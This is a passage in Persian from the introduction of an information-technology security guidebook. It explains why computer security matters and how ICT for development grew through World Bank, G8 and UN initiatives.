‫ﺑﺴﺘﻪ ﻫﺎﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳﺐ ﻧﻜﻨﻨـﺪ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﻣﺤـﻞ ﺟﻐﺮﺍﻓﻴـﺎﻳﻲ‬
‫ﺧﻮﺩ ﻭ ﻳﺎ ﻛﺎﺭﺑﺮ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺣﻤﻠﻪ ﻭ ﺍﺯ ﺁﻥ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺩﺭ ﻣﻨﺰﻝ ﻭ ﻳﺎ ﻣﺤﻞ ﻛﺎﺭ ﺧـﻮﺩ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺑﺮ ﻋﻬـﺪﺓ ﺷـﻤﺎ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻛﺘﺎﺏ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﺟﺰﺋﻴﺎﺕ ﻓﻨﻲ ﻭ ﻧﺤﻮﺓ ﻛﺎﺭﻛﺮﺩﻥ‬
‫ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳـﺎ ﺷـﺒﻜﻪﺍﻱ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻣﺘـﺼﻞ ﺑـﻪ ﻫـﻢ ﺭﺍ‬
‫ﺑﻴﺎﻣﻮﺯﻳﺪ‪ .‬ﺗﻼﺵ ﺑﺮﺍﻱ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﻇﻴﻔﺔ ﻫﺮ ﻓﺮﺩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻓﺮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﻋﺎﺩﻱ‪ ،‬ﻛﺎﺭﺷﻨﺎﺱ ﻓﻨﻲ‪ ،‬ﺭﺍﻫﺒﺮ ﺳﻴـﺴﺘﻢ‪،‬‬
‫ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ‪ ،‬ﻭ ﻣﺪﻳﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺷـﺒﻜﻪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﺪ‪.‬‬
‫ﺗﻮﺟﻪ ﺑﻪ ﺍﻫﻤﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺍﻗـﺪﺍﻣﺎﺕ ﺿـﺮﻭﺭﻱ ﻭ‬
‫ﺍﻃﻤﻴﻨﺎﻥﺑﺨﺸﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎ ﺻـﻮﺭﺕ ﭘـﺬﻳﺮﺩ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻤﻮﻋﻪﺍﻱ ﻣﺆﺛﺮ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﮔﺎﻡ ﻣﻬﻤـﻲ‬
‫ﺩﺭ ﺟﻬﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺁﻧـﺼﻮﺭﺕ ﺩﺭ ﺑﻴـﺸﺘﺮ‬
‫‪١٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻣﻮﺍﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻳﻤـﻦ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻭ ﺧﻮﺍﻫﻴﺪ ﺗﻮﺍﻧﺴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺍﻣـﻦ‬
‫ﺩﺭ ﺷﺒﻜﻪ ﺑﺎ ﺳﺎﻳﺮﻳﻦ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪(۴‬‬
‫‪(۵‬‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺯﻣﺎﻧﻲﺗﻬﻴﻪ ﺷﺪ ﻛﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭ ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ‪ -‬ﺍﺟﺘﻤﺎﻋﻲ ﺑـﻪ ﺍﻭﺝ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩ‬
‫ﺑﻮﺩ ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺑـﻪ ﻣـﺪﺕ ‪ ۴۰‬ﺳـﺎﻝ ﻳـﺎ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻏﺎﻟـﺐ‬
‫ﻃﺮﺣﻬﺎﻱ ﻣﻨﻄﻘﻪﺍﻱ ﻳﺎ ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳـﺎﻧﻲ‬
‫ﺩﻭﻣﻨﻈﻮﺭﻩ ﻳﺎ ﭼﻨﺪﻣﻨﻈﻮﺭﻩ ﺍﺟﺮﺍ ﻣﻲﺷﺪﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻓﺖ‪ .‬ﺍﻳﻦ ﺑـﺎﻭﺭ‬
‫ﻛﻪ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻳﻚ ﻣﻮﺿﻮﻉ ﻣﻬـﻢ ﻭ ﺣﻴـﺎﺗﻲ‬
‫ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﻮﺳـﻌﻪﺍﻱ ﺍﺳـﺖ ﻣﻮﺿـﻮﻋﻲ‬
‫ﻧﺴﺒﺘﹰﺎ ﺗﺎﺯﻩ ﻣﻲﺑﺎﺷﺪ ﻭ ﺷﺮﻭﻉ ﺁﻥ ﺑـﻪ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﺒﻜﻪ ﺟﻬـﺎﻧﻲ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ‪ ۹۰‬ﻣﻴﻼﺩﻱ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﺑﺮﺍﻱ ﺍﻭﻟﻴﻦ ﺑﺎﺭ ﺩﺭ ﻳـﻚ ﻣﺆﺳـﺴﺔ ﭼﻨـﺪﻣﻨﻈﻮﺭﻩ ﺗﻮﺳـﻂ ﺑﺮﻧﺎﻣـﺔ‬
‫‪ infoDev‬ﺩﺭ ﮔــﺮﻭﻩ ﺑﺎﻧــﻚ ﺟﻬــﺎﻧﻲ ﺩﺭ ﺳــﺎﻝ ‪ ۱۹۹۵‬ﻣــﻴﻼﺩﻱ‬
‫ﺭﺳﻤﹰﺎ ﺍﻋﻼﻡ ﺷﺪ ﻭ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻜﺮﻱ ﺭﺋﻴﺲ ﻭﻗﺖ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ‬
‫ﺟﻴﻤﺰ ﻭﻟﻔﺴﻦ‪ ١‬ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﻮﺩ ﻛﻪ ﺑﺮ ﺍﻫﻤﻴﺖ ﺑـﻪﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻫـﺪﺍﻑ ﺗﻮﺳـﻌﺔ ﺍﻗﺘـﺼﺎﺩﻱ‪ -‬ﺍﺟﺘﻤـﺎﻋﻲ‬
‫ﺗﺄﻛﻴﺪ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺖ‪ .‬ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌﺪ ﺧﻮﺵﺑﻴﻨﻲ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﺗﻮﺳﻌﺔ ﺍﻗﺘﺼﺎﺩﻱ‪ -‬ﺍﺟﺘﻤﺎﻋﻲ ﺑﻴﺸﺘﺮ ﺷـﺪ ﻛـﻪ ﺑﺨـﺸﻲ ﺍﺯ ﺁﻥ ﺑـﻪ‬
‫ﺩﻟﻴﻞ ﺗﻮﺳﻌﺔ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺯﺍﻥ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺑﻮﺩ‪.‬‬
‫‪(۶‬‬
‫‪(۷‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ﮔـﺮﻭﻩ ‪ ،G8‬ﻛﻤﻴﺘـﺔ ﻛـﺎﺭﻱ‬
‫ﻓﺮﺻــﺘﻬﺎﻱ ﺩﻳﺠﻴﺘــﺎﻟﻲ )‪ ٢(DOT‬ﺭﺍ ﭘﺎﻳــﻪﺭﻳــﺰﻱ ﻛﺮﺩﻧــﺪ‪ .‬ﻛﻤﻴﺘــﺔ‬
‫‪ DOT‬ﻧﺘﺎﻳﺞ ﻛﺎﺭ ﺧﻮﺩ ﺭﺍ ﻃﻲ ﮔﺰﺍﺭﺷﻲ ﺍﺭﺍﺋـﻪ ﻧﻤـﻮﺩ ﻭ ﺧﻮﺍﺳـﺘﺎﺭ‬
‫ﻗﺮﺍﺭﮔﺮﻓﺘﻦ ‪ ۹‬ﻣﻮﺿﻮﻉ ﺩﺭ ﻃﺮﺡ ﺍﺟﺮﺍﻳﻲ ﮊﻧﻮ‪ ٣‬ﺷﺪ ﻛﻪ ﻫﻤـﺔ ﺁﻧﻬـﺎ‬
‫ﺩﺭ ﺍﺟــﻼﺱ ﺳــﺮﺍﻥ ﮊﻧــﻮ ﺩﺭ ﺳــﺎﻝ ‪ ۲۰۰۱‬ﺑــﻪ ﺗﺄﻳﻴــﺪ ﻭ ﺍﻣــﻀﺎﻱ‬
‫ﺭﻫﺒــﺮﺍﻥ ﮔــﺮﻭﻩ ‪ G8‬ﺭﺳــﻴﺪﻧﺪ‪ .‬ﺍﻋــﻀﺎﻱ ﺍﺻــﻠﻲ ﻛﻤﻴﺘــﺔ ‪DOT‬‬
‫ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺍﺻﻠﻲ ﮔـﺮﻭﻩ ‪ G8‬ﻭ ﺩﻭﻟﺘﻬـﺎﻱ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪ‪ ،‬ﺑﺨﺸﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺍﻧﺒـﻮﻫﻲ‬
‫ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻫﺴﺘﻨﺪ‪ .‬ﮔﺰﺍﺭﺵ ﻣﺰﺑـﻮﺭ ﺷـﺎﻣﻞ ‪ ۷‬ﺑﻨـﺪ‬
‫ﻋﻤﻠﻴــﺎﺗﻲ ﺑﻌﻨــﻮﺍﻥ ﻣﻮﺿــﻮﻋﺎﺕ ﺣﻴــﺎﺗﻲ ﺑــﺮﺍﻱ ﺍﻳﺠــﺎﺩ ﺟﺎﻣﻌــﺔ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻣﻲﺑﺎﺷﺪ‪:‬‬
‫‪ (۱‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ‬
‫‪ (۲‬ﺍﺭﺗﻘﺎ ﻭ ﺑﻬﺒﻮﺩ ﺩﺳﺘﺮﺳﻲ‬
‫‪ (۳‬ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ‬
‫‪James Wolfensohn‬‬
‫‪Digital Opportunity Taskforce Group‬‬
‫‪Genoa Plan of Action‬‬
‫‪1‬‬
‫‪2‬‬
‫‪3‬‬
‫ﭘﺮﻭﺭﺵ ﻛﺎﺭﺁﻓﺮﻳﻨﺎﻥ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻛﺎﺭﺁﻓﺮﻳﻨﻲ‬
‫ﻣﺸﺎﺭﻛﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻛﺎﺭﺑﺮﺩ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﺑﻬﺪﺍﺷﺖ ﻭ ﺳﻼﻣﺖ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻣﻔﺎﻫﻴﻢ ﻣﺤﻠﻲ‬
‫ﻳﻜﻲ ﺍﺯ ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﺍﻳﺠﺎﺩ ﻛﻤﻴﺘﺔ ﺍﺟﺮﺍﻳﻲ ‪ ICT‬ﺩﺑﻴﺮ ﻛـﻞ‬
‫ﺳﺎﺯﻣﺎﻥ ﻣﻠﻞ‪ ٤‬ﺑﻮﺩ ﻭ ﺍﺯ ﺩﻳﮕﺮ ﻧﺘـﺎﻳﺞ ﺁﻥ ﻣـﻲﺗـﻮﺍﻥ ﺑـﻪ ﺗـﺸﻜﻴﻞ‬
‫ﻣﺆﺳﺴﺔ ﭘﻴﺸﮕﺎﻣﺎﻥ ﻓﺮﺻﺘﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‪ ٥‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺍﻋﺘﺒﺎﺭ ‪ ،٦UNDP‬ﺑﻨﻴﺎﺩ ﺁﻛﺴﻨﭽﺮ‪ ٧‬ﻭ ﺑﻨﻴﺎﺩ ﻣﺎﺭﻛﻞ‪ ٨‬ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫ﻫﻤﭽﻨﻴﻦ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻣﺆﺳـﺴﺎﺕ ﺩﻭﻣﻨﻈـﻮﺭﻩ ﺩﺭ ﻃﺮﺣﻬـﺎﻱ‬
‫ﺗﻮﺳــﻌﻪﺍﻱ ﺧــﻮﺩ ﺗﻮﺟــﻪ ﺭﻭﺯﺍﻓﺰﻭﻧــﻲ ﺑــﻪ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﻭ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ‪ ITU‬ﻭ ‪ UNESCO‬ﻧﻴﺰ‬
‫ﻃﺮﺣﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﮔـﺰﺍﺭﻱ ﺩﻭ ﺍﺟـﻼﺱ ﺟﻬـﺎﻧﻲ ﺑـﺎ ﻧﺎﻣﻬـﺎﻱ‬
‫ﺍﺟــﻼﺱ ﺟﻬــﺎﻧﻲ ﺳــﺮﺍﻥ ﺟﺎﻣﻌــﺔ ﺍﻃﻼﻋــﺎﺗﻲ )‪ ٩(WSIS‬ﺩﺭ ﮊﻧــﻮ‬
‫)ﺩﺳﺎﻣﺒﺮ ‪ (۲۰۰۳‬ﻭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳﻞ ‪ (۲۰۰۵‬ﺍﺭﺍﺋﻪ ﻛﺮﺩﻧﺪ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺷـﻜﻞ ﻏﻴﺮﻣـﺴﺘﻘﻴﻢ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎ ﺭﺍ ﺩﺭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺍﻫﺪﺍﻑ ﺗﻮﺳـﻌﻪﺍﻱ ﻫـﺰﺍﺭﻩ‬
‫)‪ ١٠(MDG‬ﭘــﺸﺘﻴﺒﺎﻧﻲ ﻛﻨــﺪ‪ .‬ﺳﻴﺎﺳــﺘﻬﺎﻱ ﺍﺻــﻠﻲ ﺗــﺄﻣﻴﻦ ﺍﻣﻨﻴــﺖ‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺁﻧﻬـﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ ﺑﺎﻋـﺚ‬
‫ﺗﻘﻮﻳﺖ ﺟﺮﻳﺎﻥ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ‬
‫ﺧﻮﺍﻫﺪ ﺷﺪ ﻭ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎ ﺑﻪ ﻓﺮﺍﻫﻢ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ ﺑـﺮﺍﻱ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﻣﻲﺍﻧﺠﺎﻣﺪ‪.‬‬
‫ﺣﺎﻝ ﺍﻳﻦ ﺳﺆﺍﻝ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﭼﺮﺍ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻛﻪ ﺩﺭ ﻭﻫﻠـﺔ‬
‫ﺍﻭﻝ ﺑﺮﺍﻱ ﺧﻮﺍﻧﻨﺪﮔﺎﻧﻲ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﻧﮕﺎﺷـﺘﻪ‬
‫ﺷﺪﻩ ﻧﻴﺎﺯ ﺍﺳﺖ‪ .‬ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛـﻪ ﺍﺻـﻮﻝ‬
‫ﺍﻣﻨﻴﺘﻲ ﻫﻤﻮﺍﺭﻩ ﻳﻜﺴﺎﻧﻨﺪ؛ ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﺭ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ‪ ،‬ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻳـﺎ ﺗﻮﺳـﻌﻪﻧﻴﺎﻓﺘـﻪ ﺑﺎﺷـﻴﺪ؛ ﭼﺮﺍﻛـﻪ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻫـﺮ ﮔﻮﺷـﺔ‬
‫ﺟﻬﺎﻥ ﻇﺎﻫﺮ ﺷﻮﻧﺪ‪ .‬ﺍﻟﺒﺘﻪ ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺍﻳﻤـﻦ ﻛـﺮﺩﻥ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﻲ ﺗﺮﺩﻳـﺪ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻫﻤﻴﺸﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﻭ ﺍﺭﺯﺍﻥ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫‪U.N. Secretary General's ICT Task Force‬‬
‫‪Global Digital Opportunities Initiative‬‬
‫‪United Nations Development Program‬‬
‫‪Accenture Foundation‬‬
‫‪Markle Foundation‬‬
‫‪World Summit on Information Society‬‬
‫‪Millennium Development Goals‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6‬‬
‫‪7‬‬
‫‪8‬‬
‫‪9‬‬
‫‪10‬‬
‫‪١٥‬‬
‫ﭘﻴﺶﺩﺭﺁﻣﺪ‬
‫ﺍﺑﺘﺪﺍ ﺫﻛﺮ ﺍﻳﻦ ﻧﻜﺘﻪ ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺩﺭ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺳﺘﺮﺳﻲ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﺗﻜﻨﻴﻜﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﻛﺎﺭﻱ ﺑـﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﻧﻤﺎﻳـﺪ‪ .‬ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻛﺘﺎﺑﻔﺮﻭﺷـﻲﻫـﺎ ﻭ‬
‫ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ‬
‫ﻭ ﻟﺬﺍ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﺍﺯ ﺍﻓـﺮﺍﺩ ﻫـﻢﺻـﻨﻒ ﺩﻳﮕـﺮ ﺑـﻪ ﺭﺍﺣﺘـﻲ‬
‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺯﻣﺎﻧﻲ ﻛﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺷﺒﻜﻪ ﺩﭼﺎﺭ ﺍﺷـﻜﺎﻝ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻣﺠﻤﻮﻋﻪﺍﻱ ﻏﻨﻲ ﺍﺯ ﻛﺎﻧﺎﻟﻬـﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‬
‫ﻛﻪ ﺍﺧﺒﺎﺭ ﻭ ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ ﺍﺭﺳـﺎﻝ ﻣـﻲﮔـﺮﺩﺩ‪.‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺩﺍﺭﺍﻱ‬
‫ﻣﺮﺍﻛﺰ ﻛﻤﻚﺭﺳﺎﻧﻲ‪ ١١‬ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨـﻲ ﺍﺩﺍﺭﻩ‬
‫ﻣﻲﺷﻮﻧﺪ ﻭ ﻗﺎﺩﺭ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﺳﻮﺀ ﻣﻨـﺎﺑﻊ ﺳـﺎﺯﻣﺎﻧﻲ ﻭ‬
‫ﺗﺄﻣﻴﻦ ﺣﻔﺎﻇﺖ ﺁﻧﻬﺎ ﻣﻲﺑﺎﺷﻨﺪ‪.‬‬
‫ﻻ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﻪ ﻣﻌﻤـﻮ ﹰ‬
‫ﻓﺎﻗﺪ ﺗﻮﺍﻧﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺍﻳﻦ ﺳﻄﺢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﺍﻧﺪﻙ ﺍﺳﺖ ﻭ ﺑﻪ ﻫﺸﺪﺍﺭﻫﺎ ﻭ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻧﻴـﺰ ﺗﻮﺟـﻪ‬
‫ﻧﻤﻲﺷﻮﺩ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻏﺎﻟﺒﹰﺎ ﺩﺍﺭﺍﻱ‬
‫ﺑﺨﺶ ﺳﺘﺎﺩﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻭ ﻟﺬﺍ ﺗﻮﺍﻧﺎﻳﻲ ﻧﻈﺎﺭﺕ ﺑـﺮ ﻣﻨـﺎﺑﻊ‬
‫ﻓﻨﻲ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻭﻗﺎﺕ ﺍﻳﻦ ﻋﺪﻡ ﺗﻮﺟـﻪ ﻭ‬
‫ﻧﺎﺗﻮﺍﻧﻲ ﺑﻪ ﺩﻟﻴﻞ ﻋﺪﻡ ﻭﺟﻮﺩ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺩﺍﻧـﺶ ﻛـﺎﻓﻲ ﺩﺭﺑـﺎﺭﺓ‬
